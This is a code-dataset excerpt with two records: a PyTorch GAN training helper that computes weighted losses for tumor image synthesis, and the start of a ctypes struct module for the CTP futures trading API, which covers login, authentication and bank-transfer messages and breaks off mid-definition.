driver/helper/SYNHelper_Dilate_Gate_Richer_Lcon_Lpercep_Lsty.py
|
qgking/FRGAN
|
b6a250c46981707c43c3889f80d8cc3ec31edaaf
|
[
"MIT"
] | 2
|
2021-11-07T13:25:51.000Z
|
2022-01-18T07:09:30.000Z
|
from tumor_data.SYNDataLoader import *
from tensorboardX import SummaryWriter
from torchsummaryX import summary
from driver.helper.base_syn_helper import BaseTrainHelper
class SYNHelper_Dilate_Gate_Richer_Lcon_Lpercep_Lsty(BaseTrainHelper):
    """Train/eval helper for the dilated-gate generator with Richer-style
    boundary side outputs and the Lcon / Lpercep / Lsty loss terms.

    Which loss terms are active is controlled by substrings of
    ``config.helper`` ('Lsty', 'Lpercep', 'Richer', 'Lcon').  The generator
    is expected to return a dict with keys 'outputs', 'so_out',
    'coarse_outputs' and 'so_out_c' -- TODO confirm against the generator
    implementation.
    """

    def __init__(self, generator, discriminator,
                 criterions, config):
        super(SYNHelper_Dilate_Gate_Richer_Lcon_Lpercep_Lsty, self).__init__(
            generator, discriminator, criterions, config)

    def out_put_shape(self):
        # Only the tensorboard writer is required here; the commented-out
        # model-summary debug prints that used to live in this method were
        # dead code and have been removed.
        self.summary_writer = SummaryWriter(self.config.tensorboard_dir)

    # ------------------------------------------------------------------
    # Private loss helpers shared by the test and train paths.  Each
    # returns (loss_tensor, logged_scalar); the scalar stays 0 (int) when
    # the corresponding term is disabled, matching the original logging.
    # ------------------------------------------------------------------
    def _zero(self, ref):
        # Scalar zero on the same device as `ref`.  The original hard-coded
        # `.cuda()`, which breaks CPU runs and non-default GPU devices.
        return torch.zeros(1, device=ref.device)

    def _style_loss(self, fake_B, real_B, zero):
        # Style loss, active only when 'Lsty' is configured.
        loss, logged = zero, 0
        if 'Lsty' in self.config.helper:
            loss = self.criterions['StyleLoss'](fake_B, real_B)
            logged = loss.item()
        return loss, logged

    def _percep_loss(self, fake_B, real_B, zero):
        # VGG perceptual loss, active only when 'Lpercep' is configured.
        loss, logged = zero, 0
        if 'Lpercep' in self.config.helper:
            loss = self.criterions['VGGLoss'](fake_B, real_B)
            logged = loss.item()
        return loss, logged

    def _boundary_loss(self, side_outs, real_B, boundary_B, zero):
        # Sum of masked-L1 losses over the Richer side outputs (may be None).
        loss, logged = zero, 0
        if 'Richer' in self.config.helper and side_outs is not None:
            for out in side_outs:
                loss = loss + self.criterions['L1LossMaskedMean'](out, real_B, boundary_B)
            logged = loss.item()
        return loss, logged

    def _tumor_loss(self, pred, real_B, tumor_B, zero):
        # Masked-L1 reconstruction loss inside the tumor mask ('Lcon').
        loss, logged = zero, 0
        if 'Lcon' in self.config.helper and pred is not None:
            loss = self.criterions['L1LossMaskedMean'](pred, real_B, tumor_B)
            logged = loss.item()
        return loss, logged

    def _pixel_loss(self, pred, real_B, zero):
        # Plain pixel-wise loss over the whole volume.
        loss, logged = zero, 0
        if pred is not None and real_B is not None:
            loss = self.criterions['criterion_pixelwise'](pred, real_B)
            logged = loss.item()
        return loss, logged

    def _generator_gan_loss(self, fake_B, tumor_B):
        # Adversarial loss for the generator step: D should label the fake
        # volume as real.
        # BUG FIX: the original called `fake_B.detach()` here, which cut the
        # GAN gradient to the generator entirely -- the adversarial term was
        # a constant w.r.t. G.  fake_B must stay attached during the G step
        # (detaching belongs in the discriminator step only).
        pred_fake = self.discriminator(torch.cat((fake_B, tumor_B), 1))
        out_shape = (pred_fake.size(0), 1, pred_fake.size(2), pred_fake.size(3), pred_fake.size(4))
        valid_label = self.FloatTensor(np.ones(out_shape))
        return self.criterions['criterion_GAN'](pred_fake, valid_label)

    def _total_loss(self, loss_GAN, loss_vgg, loss_style, loss_pixel,
                    loss_pixel_coarse, loss_tumor, loss_tumor_coarse,
                    loss_boundary, loss_boundary_coarse):
        # Weighted sum of all generator loss terms.
        cfg = self.config
        return loss_GAN + cfg.lambda_fix * (
                cfg.percep_loss_factor * loss_vgg +
                cfg.style_loss_factor * loss_style +
                cfg.lambda_pixel * (loss_pixel + loss_pixel_coarse) +
                cfg.tumor_loss_factor * (loss_tumor + loss_tumor_coarse) +
                cfg.boundary_loss_factor * (loss_boundary + loss_boundary_coarse))

    def test_one_batch(self, batch_gen):
        """Run one evaluation batch and report per-term loss scalars plus
        the generator outputs (fine and coarse)."""
        real_A, real_B = batch_gen['real_A'], batch_gen['real_B']
        boundary_B, tumor_B = batch_gen['boundary_B'], batch_gen['tumor_B']
        g_out = self.generator(real_A, tumor_B)
        fake_B = g_out['outputs']
        boundary_out = g_out['so_out']
        fake_B_coarse = g_out['coarse_outputs']
        boundary_out_coarse = g_out['so_out_c']
        zero = self._zero(fake_B)
        _, losses_style = self._style_loss(fake_B, real_B, zero)
        _, losses_vgg = self._percep_loss(fake_B, real_B, zero)
        _, losses_boundary_coarse = self._boundary_loss(boundary_out_coarse, real_B, boundary_B, zero)
        _, losses_boundary = self._boundary_loss(boundary_out, real_B, boundary_B, zero)
        _, losses_tumor_coarse = self._tumor_loss(fake_B_coarse, real_B, tumor_B, zero)
        _, losses_tumor = self._tumor_loss(fake_B, real_B, tumor_B, zero)
        _, losses_pixel = self._pixel_loss(fake_B, real_B, zero)
        _, losses_pixel_coarse = self._pixel_loss(fake_B_coarse, real_B, zero)
        return {
            "loss_pixel": losses_pixel,
            "loss_pixel_coarse": losses_pixel_coarse,
            "loss_boundary": losses_boundary,
            "loss_boundary_coarse": losses_boundary_coarse,
            "loss_tumor": losses_tumor,
            "loss_tumor_coarse": losses_tumor_coarse,
            "fake_B": fake_B,
            "fake_B_coarse": fake_B_coarse,
            "boundary": boundary_out,
            "boundary_coarse": boundary_out_coarse,
            "loss_percep": losses_vgg,
            "loss_style": losses_style
        }

    def train_generator_one_batch_pretrained(self, batch_gen):
        """One generator optimization step for the pre-trained setup (no
        coarse branch): computes the weighted total loss, calls backward(),
        and returns the logged scalars plus fake_B."""
        real_A, real_B = batch_gen['real_A'], batch_gen['real_B']
        boundary_B, tumor_B = batch_gen['boundary_B'], batch_gen['tumor_B']
        g_out = self.generator(real_A, tumor_B, pre_trained=True)
        fake_B = g_out['outputs']
        boundary_out = g_out['so_out']
        # D is frozen during the generator step.
        self.set_requires_grad(self.discriminator, False)
        loss_GAN_final = self._generator_gan_loss(fake_B, tumor_B)
        losses_GAN = loss_GAN_final.item()
        zero = self._zero(fake_B)
        loss_style, losses_style = self._style_loss(fake_B, real_B, zero)
        loss_vgg, losses_vgg = self._percep_loss(fake_B, real_B, zero)
        loss_boundary, losses_boundary = self._boundary_loss(boundary_out, real_B, boundary_B, zero)
        loss_tumor, losses_tumor = self._tumor_loss(fake_B, real_B, tumor_B, zero)
        loss_pixel, losses_pixel = self._pixel_loss(fake_B, real_B, zero)
        # The pre-trained path has no coarse branch: coarse terms stay zero.
        loss_G = self._total_loss(loss_GAN_final, loss_vgg, loss_style,
                                  loss_pixel, zero, loss_tumor, zero,
                                  loss_boundary, zero)
        losses_G = loss_G.item()
        loss_G.backward()
        return {
            "loss_GAN": losses_GAN,
            "loss_pixel": losses_pixel,
            "loss_pixel_coarse": 0,
            "loss_boundary": losses_boundary,
            "loss_boundary_coarse": 0,
            "loss_tumor": losses_tumor,
            "loss_tumor_coarse": 0,
            "loss_G": losses_G,
            "fake_B": fake_B,
            "loss_percep": losses_vgg,
            "loss_style": losses_style
        }

    def train_generator_one_batch(self, batch_gen):
        """One generator optimization step of the full model (coarse and
        fine branches): computes the weighted total loss, calls backward(),
        and returns the logged scalars plus fake_B."""
        real_A, real_B = batch_gen['real_A'], batch_gen['real_B']
        boundary_B, tumor_B = batch_gen['boundary_B'], batch_gen['tumor_B']
        g_out = self.generator(real_A, tumor_B)
        fake_B = g_out['outputs']
        boundary_out = g_out['so_out']
        fake_B_coarse = g_out['coarse_outputs']
        boundary_out_coarse = g_out['so_out_c']
        # D is frozen during the generator step.
        self.set_requires_grad(self.discriminator, False)
        loss_GAN_final = self._generator_gan_loss(fake_B, tumor_B)
        losses_GAN = loss_GAN_final.item()
        zero = self._zero(fake_B)
        loss_style, losses_style = self._style_loss(fake_B, real_B, zero)
        loss_vgg, losses_vgg = self._percep_loss(fake_B, real_B, zero)
        loss_boundary_coarse, losses_boundary_coarse = self._boundary_loss(
            boundary_out_coarse, real_B, boundary_B, zero)
        loss_boundary, losses_boundary = self._boundary_loss(
            boundary_out, real_B, boundary_B, zero)
        loss_tumor_coarse, losses_tumor_coarse = self._tumor_loss(
            fake_B_coarse, real_B, tumor_B, zero)
        loss_tumor, losses_tumor = self._tumor_loss(fake_B, real_B, tumor_B, zero)
        loss_pixel, losses_pixel = self._pixel_loss(fake_B, real_B, zero)
        loss_pixel_coarse, losses_pixel_coarse = self._pixel_loss(
            fake_B_coarse, real_B, zero)
        loss_G = self._total_loss(loss_GAN_final, loss_vgg, loss_style,
                                  loss_pixel, loss_pixel_coarse,
                                  loss_tumor, loss_tumor_coarse,
                                  loss_boundary, loss_boundary_coarse)
        losses_G = loss_G.item()
        loss_G.backward()
        return {
            "loss_GAN": losses_GAN,
            "loss_pixel": losses_pixel,
            "loss_pixel_coarse": losses_pixel_coarse,
            "loss_boundary": losses_boundary,
            "loss_boundary_coarse": losses_boundary_coarse,
            "loss_tumor": losses_tumor,
            "loss_tumor_coarse": losses_tumor_coarse,
            "loss_G": losses_G,
            "fake_B": fake_B,
            "loss_percep": losses_vgg,
            "loss_style": losses_style
        }
| 42.394322
| 116
| 0.59997
| 1,659
| 13,439
| 4.515371
| 0.069922
| 0.065412
| 0.038179
| 0.036043
| 0.923909
| 0.923909
| 0.923909
| 0.913229
| 0.913229
| 0.913229
| 0
| 0.008575
| 0.305826
| 13,439
| 316
| 117
| 42.528481
| 0.794405
| 0.11608
| 0
| 0.909871
| 0
| 0
| 0.081854
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021459
| false
| 0
| 0.017167
| 0
| 0.055794
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5174933140d42078b4f9d436b244d3c0b4964e07
| 552,668
|
py
|
Python
|
rqctp/structs.py
|
ricequant/rqctp
|
49bca74b51d37d6aa334b902f7e1d1124a577243
|
[
"Apache-2.0"
] | 4
|
2019-11-10T06:14:42.000Z
|
2022-02-15T01:11:40.000Z
|
rqctp/structs.py
|
ricequant/rqctp
|
49bca74b51d37d6aa334b902f7e1d1124a577243
|
[
"Apache-2.0"
] | 1
|
2019-12-13T01:09:12.000Z
|
2021-02-05T03:04:23.000Z
|
rqctp/structs.py
|
ricequant/rqctp
|
49bca74b51d37d6aa334b902f7e1d1124a577243
|
[
"Apache-2.0"
] | 2
|
2019-11-10T06:14:56.000Z
|
2020-04-27T16:56:20.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright 2019 Ricequant, Inc
#
# * Commercial Usage: please contact public@ricequant.com
# * Non-Commercial Usage:
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ctypes import c_int, c_short, c_char, c_double
from .utils import Struct
# Fixed-size byte-string types used by the CTP struct field tables below.
# c_char_Array_N is a ctypes array of N raw bytes; for CTP text fields the
# payload is GBK-encoded and NUL-terminated (so N allows N-1 characters).
c_char_Array_2 = c_char * 2
c_char_Array_3 = c_char * 3
c_char_Array_4 = c_char * 4
c_char_Array_5 = c_char * 5
c_char_Array_6 = c_char * 6
c_char_Array_7 = c_char * 7
c_char_Array_9 = c_char * 9
c_char_Array_10 = c_char * 10
c_char_Array_11 = c_char * 11
c_char_Array_12 = c_char * 12
c_char_Array_13 = c_char * 13
c_char_Array_15 = c_char * 15
c_char_Array_16 = c_char * 16
c_char_Array_17 = c_char * 17
c_char_Array_20 = c_char * 20
c_char_Array_21 = c_char * 21
c_char_Array_22 = c_char * 22
c_char_Array_23 = c_char * 23
c_char_Array_24 = c_char * 24
c_char_Array_25 = c_char * 25
c_char_Array_31 = c_char * 31
c_char_Array_33 = c_char * 33
c_char_Array_36 = c_char * 36
c_char_Array_41 = c_char * 41
c_char_Array_51 = c_char * 51
c_char_Array_61 = c_char * 61
c_char_Array_65 = c_char * 65
c_char_Array_71 = c_char * 71
c_char_Array_81 = c_char * 81
c_char_Array_100 = c_char * 100
c_char_Array_101 = c_char * 101
c_char_Array_129 = c_char * 129
c_char_Array_161 = c_char * 161
c_char_Array_201 = c_char * 201
c_char_Array_256 = c_char * 256
c_char_Array_257 = c_char * 257
c_char_Array_261 = c_char * 261
c_char_Array_273 = c_char * 273
c_char_Array_301 = c_char * 301
c_char_Array_349 = c_char * 349
c_char_Array_365 = c_char * 365
c_char_Array_401 = c_char * 401
c_char_Array_501 = c_char * 501
c_char_Array_513 = c_char * 513
c_char_Array_1001 = c_char * 1001
c_char_Array_1025 = c_char * 1025
c_char_Array_2049 = c_char * 2049
c_char_Array_2561 = c_char * 2561
class Dissemination(Struct):
    """Sequencing information attached to disseminated data."""
    _fields_ = [
        ("SequenceSeries", c_short),
        ("SequenceNo", c_int),
    ]

    def __init__(self, SequenceSeries=None, SequenceNo=None):
        super().__init__()
        # Only truthy values overwrite the ctypes zero-defaults.
        for name, value in (("SequenceSeries", SequenceSeries),
                            ("SequenceNo", SequenceNo)):
            if value:
                setattr(self, name, value)
class ReqUserLogin(Struct):
    """User login request; text fields are stored GBK-encoded."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("Password", c_char_Array_41),
        ("UserProductInfo", c_char_Array_11),
        ("InterfaceProductInfo", c_char_Array_11),
        ("ProtocolInfo", c_char_Array_11),
        ("MacAddress", c_char_Array_21),
        ("OneTimePassword", c_char_Array_41),
        ("ClientIPAddress", c_char_Array_16),
        ("LoginRemark", c_char_Array_36),
        ("ClientIPPort", c_int),
    ]

    def __init__(self, TradingDay=None, BrokerID=None, UserID=None, Password=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, MacAddress=None, OneTimePassword=None, ClientIPAddress=None, LoginRemark=None, ClientIPPort=None):
        super().__init__()
        # GBK-encode the text fields; truthy values only (zero-defaults kept).
        for name, value in (
                ("TradingDay", TradingDay), ("BrokerID", BrokerID),
                ("UserID", UserID), ("Password", Password),
                ("UserProductInfo", UserProductInfo),
                ("InterfaceProductInfo", InterfaceProductInfo),
                ("ProtocolInfo", ProtocolInfo), ("MacAddress", MacAddress),
                ("OneTimePassword", OneTimePassword),
                ("ClientIPAddress", ClientIPAddress),
                ("LoginRemark", LoginRemark)):
            if value:
                setattr(self, name, value.encode("GBK"))
        if ClientIPPort:
            self.ClientIPPort = ClientIPPort
class RspUserLogin(Struct):
    """User login response; text fields are stored GBK-encoded."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("LoginTime", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("SystemName", c_char_Array_41),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("MaxOrderRef", c_char_Array_13),
        ("SHFETime", c_char_Array_9),
        ("DCETime", c_char_Array_9),
        ("CZCETime", c_char_Array_9),
        ("FFEXTime", c_char_Array_9),
        ("INETime", c_char_Array_9),
    ]

    def __init__(self, TradingDay=None, LoginTime=None, BrokerID=None, UserID=None, SystemName=None, FrontID=None, SessionID=None, MaxOrderRef=None, SHFETime=None, DCETime=None, CZCETime=None, FFEXTime=None, INETime=None):
        super().__init__()
        # GBK-encode the text fields; truthy values only (zero-defaults kept).
        for name, value in (
                ("TradingDay", TradingDay), ("LoginTime", LoginTime),
                ("BrokerID", BrokerID), ("UserID", UserID),
                ("SystemName", SystemName), ("MaxOrderRef", MaxOrderRef),
                ("SHFETime", SHFETime), ("DCETime", DCETime),
                ("CZCETime", CZCETime), ("FFEXTime", FFEXTime),
                ("INETime", INETime)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields are stored as-is.
        if FrontID:
            self.FrontID = FrontID
        if SessionID:
            self.SessionID = SessionID
class UserLogout(Struct):
    """User logout request; text fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
    ]

    def __init__(self, BrokerID=None, UserID=None):
        super().__init__()
        for name, value in (("BrokerID", BrokerID), ("UserID", UserID)):
            if value:
                setattr(self, name, value.encode("GBK"))
class ForceUserLogout(Struct):
    """Forced user logout notice; text fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
    ]

    def __init__(self, BrokerID=None, UserID=None):
        super().__init__()
        for name, value in (("BrokerID", BrokerID), ("UserID", UserID)):
            if value:
                setattr(self, name, value.encode("GBK"))
class ReqAuthenticate(Struct):
    """Client authentication request; text fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("UserProductInfo", c_char_Array_11),
        ("AuthCode", c_char_Array_17),
        ("AppID", c_char_Array_33),
    ]

    def __init__(self, BrokerID=None, UserID=None, UserProductInfo=None, AuthCode=None, AppID=None):
        super().__init__()
        for name, value in (
                ("BrokerID", BrokerID), ("UserID", UserID),
                ("UserProductInfo", UserProductInfo),
                ("AuthCode", AuthCode), ("AppID", AppID)):
            if value:
                setattr(self, name, value.encode("GBK"))
class RspAuthenticate(Struct):
    """Client authentication response; text fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("UserProductInfo", c_char_Array_11),
        ("AppID", c_char_Array_33),
        ("AppType", c_char),
    ]

    def __init__(self, BrokerID=None, UserID=None, UserProductInfo=None, AppID=None, AppType=None):
        super().__init__()
        for name, value in (
                ("BrokerID", BrokerID), ("UserID", UserID),
                ("UserProductInfo", UserProductInfo),
                ("AppID", AppID), ("AppType", AppType)):
            if value:
                setattr(self, name, value.encode("GBK"))
class AuthenticationInfo(Struct):
    """Client authentication information; text fields are GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("UserProductInfo", c_char_Array_11),
        ("AuthInfo", c_char_Array_129),
        ("IsResult", c_int),
        ("AppID", c_char_Array_33),
        ("AppType", c_char),
    ]

    def __init__(self, BrokerID=None, UserID=None, UserProductInfo=None, AuthInfo=None, IsResult=None, AppID=None, AppType=None):
        super().__init__()
        for name, value in (
                ("BrokerID", BrokerID), ("UserID", UserID),
                ("UserProductInfo", UserProductInfo),
                ("AuthInfo", AuthInfo), ("AppID", AppID),
                ("AppType", AppType)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric field is stored as-is.
        if IsResult:
            self.IsResult = IsResult
class RspUserLogin2(Struct):
    """User login response variant with RandomString; text fields GBK-encoded."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("LoginTime", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("SystemName", c_char_Array_41),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("MaxOrderRef", c_char_Array_13),
        ("SHFETime", c_char_Array_9),
        ("DCETime", c_char_Array_9),
        ("CZCETime", c_char_Array_9),
        ("FFEXTime", c_char_Array_9),
        ("INETime", c_char_Array_9),
        ("RandomString", c_char_Array_17),
    ]

    def __init__(self, TradingDay=None, LoginTime=None, BrokerID=None, UserID=None, SystemName=None, FrontID=None, SessionID=None, MaxOrderRef=None, SHFETime=None, DCETime=None, CZCETime=None, FFEXTime=None, INETime=None, RandomString=None):
        super().__init__()
        for name, value in (
                ("TradingDay", TradingDay), ("LoginTime", LoginTime),
                ("BrokerID", BrokerID), ("UserID", UserID),
                ("SystemName", SystemName), ("MaxOrderRef", MaxOrderRef),
                ("SHFETime", SHFETime), ("DCETime", DCETime),
                ("CZCETime", CZCETime), ("FFEXTime", FFEXTime),
                ("INETime", INETime), ("RandomString", RandomString)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields are stored as-is.
        if FrontID:
            self.FrontID = FrontID
        if SessionID:
            self.SessionID = SessionID
class TransferHeader(Struct):
    """Bank-futures transfer message header; text fields GBK-encoded."""
    _fields_ = [
        ("Version", c_char_Array_4),
        ("TradeCode", c_char_Array_7),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("TradeSerial", c_char_Array_9),
        ("FutureID", c_char_Array_11),
        ("BankID", c_char_Array_4),
        ("BankBrchID", c_char_Array_5),
        ("OperNo", c_char_Array_17),
        ("DeviceID", c_char_Array_3),
        ("RecordNum", c_char_Array_7),
        ("SessionID", c_int),
        ("RequestID", c_int),
    ]

    def __init__(self, Version=None, TradeCode=None, TradeDate=None, TradeTime=None, TradeSerial=None, FutureID=None, BankID=None, BankBrchID=None, OperNo=None, DeviceID=None, RecordNum=None, SessionID=None, RequestID=None):
        super().__init__()
        for name, value in (
                ("Version", Version), ("TradeCode", TradeCode),
                ("TradeDate", TradeDate), ("TradeTime", TradeTime),
                ("TradeSerial", TradeSerial), ("FutureID", FutureID),
                ("BankID", BankID), ("BankBrchID", BankBrchID),
                ("OperNo", OperNo), ("DeviceID", DeviceID),
                ("RecordNum", RecordNum)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields are stored as-is.
        if SessionID:
            self.SessionID = SessionID
        if RequestID:
            self.RequestID = RequestID
class TransferBankToFutureReq(Struct):
    """Bank-to-futures transfer request; text fields GBK-encoded."""
    _fields_ = [
        ("FutureAccount", c_char_Array_13),
        ("FuturePwdFlag", c_char),
        ("FutureAccPwd", c_char_Array_17),
        ("TradeAmt", c_double),
        ("CustFee", c_double),
        ("CurrencyCode", c_char_Array_4),
    ]

    def __init__(self, FutureAccount=None, FuturePwdFlag=None, FutureAccPwd=None, TradeAmt=None, CustFee=None, CurrencyCode=None):
        super().__init__()
        for name, value in (
                ("FutureAccount", FutureAccount),
                ("FuturePwdFlag", FuturePwdFlag),
                ("FutureAccPwd", FutureAccPwd),
                ("CurrencyCode", CurrencyCode)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Monetary amounts are stored as-is.
        if TradeAmt:
            self.TradeAmt = TradeAmt
        if CustFee:
            self.CustFee = CustFee
class TransferBankToFutureRsp(Struct):
    """Bank-to-futures transfer response; text fields GBK-encoded."""
    _fields_ = [
        ("RetCode", c_char_Array_5),
        ("RetInfo", c_char_Array_129),
        ("FutureAccount", c_char_Array_13),
        ("TradeAmt", c_double),
        ("CustFee", c_double),
        ("CurrencyCode", c_char_Array_4),
    ]

    def __init__(self, RetCode=None, RetInfo=None, FutureAccount=None, TradeAmt=None, CustFee=None, CurrencyCode=None):
        super().__init__()
        for name, value in (
                ("RetCode", RetCode), ("RetInfo", RetInfo),
                ("FutureAccount", FutureAccount),
                ("CurrencyCode", CurrencyCode)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Monetary amounts are stored as-is.
        if TradeAmt:
            self.TradeAmt = TradeAmt
        if CustFee:
            self.CustFee = CustFee
class TransferFutureToBankReq(Struct):
    """Futures-to-bank transfer request; text fields GBK-encoded."""
    _fields_ = [
        ("FutureAccount", c_char_Array_13),
        ("FuturePwdFlag", c_char),
        ("FutureAccPwd", c_char_Array_17),
        ("TradeAmt", c_double),
        ("CustFee", c_double),
        ("CurrencyCode", c_char_Array_4),
    ]

    def __init__(self, FutureAccount=None, FuturePwdFlag=None, FutureAccPwd=None, TradeAmt=None, CustFee=None, CurrencyCode=None):
        super().__init__()
        for name, value in (
                ("FutureAccount", FutureAccount),
                ("FuturePwdFlag", FuturePwdFlag),
                ("FutureAccPwd", FutureAccPwd),
                ("CurrencyCode", CurrencyCode)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Monetary amounts are stored as-is.
        if TradeAmt:
            self.TradeAmt = TradeAmt
        if CustFee:
            self.CustFee = CustFee
class TransferFutureToBankRsp(Struct):
    """Futures-to-bank transfer response; text fields GBK-encoded."""
    _fields_ = [
        ("RetCode", c_char_Array_5),
        ("RetInfo", c_char_Array_129),
        ("FutureAccount", c_char_Array_13),
        ("TradeAmt", c_double),
        ("CustFee", c_double),
        ("CurrencyCode", c_char_Array_4),
    ]

    def __init__(self, RetCode=None, RetInfo=None, FutureAccount=None, TradeAmt=None, CustFee=None, CurrencyCode=None):
        super().__init__()
        for name, value in (
                ("RetCode", RetCode), ("RetInfo", RetInfo),
                ("FutureAccount", FutureAccount),
                ("CurrencyCode", CurrencyCode)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Monetary amounts are stored as-is.
        if TradeAmt:
            self.TradeAmt = TradeAmt
        if CustFee:
            self.CustFee = CustFee
class TransferQryBankReq(Struct):
    """Bank balance query request; text fields GBK-encoded."""
    _fields_ = [
        ("FutureAccount", c_char_Array_13),
        ("FuturePwdFlag", c_char),
        ("FutureAccPwd", c_char_Array_17),
        ("CurrencyCode", c_char_Array_4),
    ]

    def __init__(self, FutureAccount=None, FuturePwdFlag=None, FutureAccPwd=None, CurrencyCode=None):
        super().__init__()
        for name, value in (
                ("FutureAccount", FutureAccount),
                ("FuturePwdFlag", FuturePwdFlag),
                ("FutureAccPwd", FutureAccPwd),
                ("CurrencyCode", CurrencyCode)):
            if value:
                setattr(self, name, value.encode("GBK"))
class TransferQryBankRsp(Struct):
    """Bank balance query response; text fields GBK-encoded."""
    _fields_ = [
        ("RetCode", c_char_Array_5),
        ("RetInfo", c_char_Array_129),
        ("FutureAccount", c_char_Array_13),
        ("TradeAmt", c_double),
        ("UseAmt", c_double),
        ("FetchAmt", c_double),
        ("CurrencyCode", c_char_Array_4),
    ]

    def __init__(self, RetCode=None, RetInfo=None, FutureAccount=None, TradeAmt=None, UseAmt=None, FetchAmt=None, CurrencyCode=None):
        super().__init__()
        for name, value in (
                ("RetCode", RetCode), ("RetInfo", RetInfo),
                ("FutureAccount", FutureAccount),
                ("CurrencyCode", CurrencyCode)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Monetary amounts are stored as-is.
        if TradeAmt:
            self.TradeAmt = TradeAmt
        if UseAmt:
            self.UseAmt = UseAmt
        if FetchAmt:
            self.FetchAmt = FetchAmt
class TransferQryDetailReq(Struct):
    """Transfer detail query request; the account is GBK-encoded."""
    _fields_ = [
        ("FutureAccount", c_char_Array_13),
    ]

    def __init__(self, FutureAccount=None):
        super().__init__()
        if FutureAccount:
            self.FutureAccount = FutureAccount.encode("GBK")
class TransferQryDetailRsp(Struct):
    """Transfer detail query response; text fields GBK-encoded."""
    _fields_ = [
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("TradeCode", c_char_Array_7),
        ("FutureSerial", c_int),
        ("FutureID", c_char_Array_11),
        ("FutureAccount", c_char_Array_22),
        ("BankSerial", c_int),
        ("BankID", c_char_Array_4),
        ("BankBrchID", c_char_Array_5),
        ("BankAccount", c_char_Array_41),
        ("CertCode", c_char_Array_21),
        ("CurrencyCode", c_char_Array_4),
        ("TxAmount", c_double),
        ("Flag", c_char),
    ]

    def __init__(self, TradeDate=None, TradeTime=None, TradeCode=None, FutureSerial=None, FutureID=None, FutureAccount=None, BankSerial=None, BankID=None, BankBrchID=None, BankAccount=None, CertCode=None, CurrencyCode=None, TxAmount=None, Flag=None):
        super().__init__()
        for name, value in (
                ("TradeDate", TradeDate), ("TradeTime", TradeTime),
                ("TradeCode", TradeCode), ("FutureID", FutureID),
                ("FutureAccount", FutureAccount), ("BankID", BankID),
                ("BankBrchID", BankBrchID), ("BankAccount", BankAccount),
                ("CertCode", CertCode), ("CurrencyCode", CurrencyCode),
                ("Flag", Flag)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields are stored as-is.
        if FutureSerial:
            self.FutureSerial = FutureSerial
        if BankSerial:
            self.BankSerial = BankSerial
        if TxAmount:
            self.TxAmount = TxAmount
class RspInfo(Struct):
    """Generic response status: error code plus GBK-encoded message."""
    _fields_ = [
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]

    def __init__(self, ErrorID=None, ErrorMsg=None):
        super().__init__()
        if ErrorID:
            self.ErrorID = ErrorID
        if ErrorMsg:
            self.ErrorMsg = ErrorMsg.encode("GBK")
class Exchange(Struct):
    """Exchange description; all fields are GBK-encoded text."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("ExchangeName", c_char_Array_61),
        ("ExchangeProperty", c_char),
    ]

    def __init__(self, ExchangeID=None, ExchangeName=None, ExchangeProperty=None):
        super().__init__()
        for name, value in (
                ("ExchangeID", ExchangeID),
                ("ExchangeName", ExchangeName),
                ("ExchangeProperty", ExchangeProperty)):
            if value:
                setattr(self, name, value.encode("GBK"))
class Product(Struct):
    """Product definition; text fields GBK-encoded, numeric fields as-is."""
    _fields_ = [
        ("ProductID", c_char_Array_31),
        ("ProductName", c_char_Array_21),
        ("ExchangeID", c_char_Array_9),
        ("ProductClass", c_char),
        ("VolumeMultiple", c_int),
        ("PriceTick", c_double),
        ("MaxMarketOrderVolume", c_int),
        ("MinMarketOrderVolume", c_int),
        ("MaxLimitOrderVolume", c_int),
        ("MinLimitOrderVolume", c_int),
        ("PositionType", c_char),
        ("PositionDateType", c_char),
        ("CloseDealType", c_char),
        ("TradeCurrencyID", c_char_Array_4),
        ("MortgageFundUseRange", c_char),
